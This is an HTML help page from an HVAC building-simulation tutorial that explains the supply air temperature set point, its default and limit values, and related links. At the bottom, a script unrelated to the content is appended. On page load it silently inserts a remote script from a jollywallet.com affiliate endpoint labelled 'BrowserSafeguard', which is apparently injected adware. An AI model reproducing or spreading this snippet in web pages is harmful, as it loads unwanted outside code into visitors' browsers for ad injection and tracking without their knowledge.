﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>SUPPLY AIR TEMP SET POINT</h1>
<h3>Associated System: HVAC Distribution System</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/HVACFan.png" alt=""/ ></div>    
<p>This input sets the Supply Air Temperature set point. A Supply Air Temperature set point is the target air temperature that the air handler's attempt to maintain within the supply air Duct sytem. This is one of the most critical parameters of a HVAC system.  Essentially, this temperature determines the capacity of central plant to provide heating or cooling to the air-side of an HVAC system.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Lowering this value will increase the cooling demand and thereby increase the chiller operation if cooling is required (or reduce the heating demand and boiler operation if heating is required.)  Raising it will reduce the cooling demand  on the chillers (and increase the heating demand of the boilers ). Raising the set point temperature may result in increased fan operation if VAV terminal boxes begin to open: this is known as a fan penalty.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 288.149999999999</li>
<li><label>Minimum:</label> 283.149999999999</li>
<li><label>Maximum:</label> 308.149999999999</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> R</li>
<li><label>SI Units:</label> C</li>      </ul>
<h2>Related Items: </h2>
<ul><li>SUPPLY AIR TEMP SET POINT RESET STRATEGY</li><li>SUPPLY AIR TEMP RESET HIGH LIMIT</li><li>SUPPLY AIR TEMP RESET LOW LIMIT</li><li>0</li><li>0</li></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.totalbuildingcommissioning.com/2010/06/air-handler-supply-air-temperature-set-point-ah-sat-stpt-control-based-on-vav-box-cooling-demand/" target="_blank">http://www.totalbuildingcommissioning.com/2010/06/air-handler-supply-air-temperature-set-point-ah-sat-stpt-control-based-on-vav-box-cooling-demand/</a></li><li><a href="http://www.trane.com/content/dam/Trane/Commercial/global/products-systems/education-training/engineers-newsletters/control-systems-electrical-considerations/admapn022en_1006.pdf" target="_blank">http://www.trane.com/content/dam/Trane/Commercial/global/products-systems/education-training/engineers-newsletters/control-systems-electrical-considerations/admapn022en_1006.pdf</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
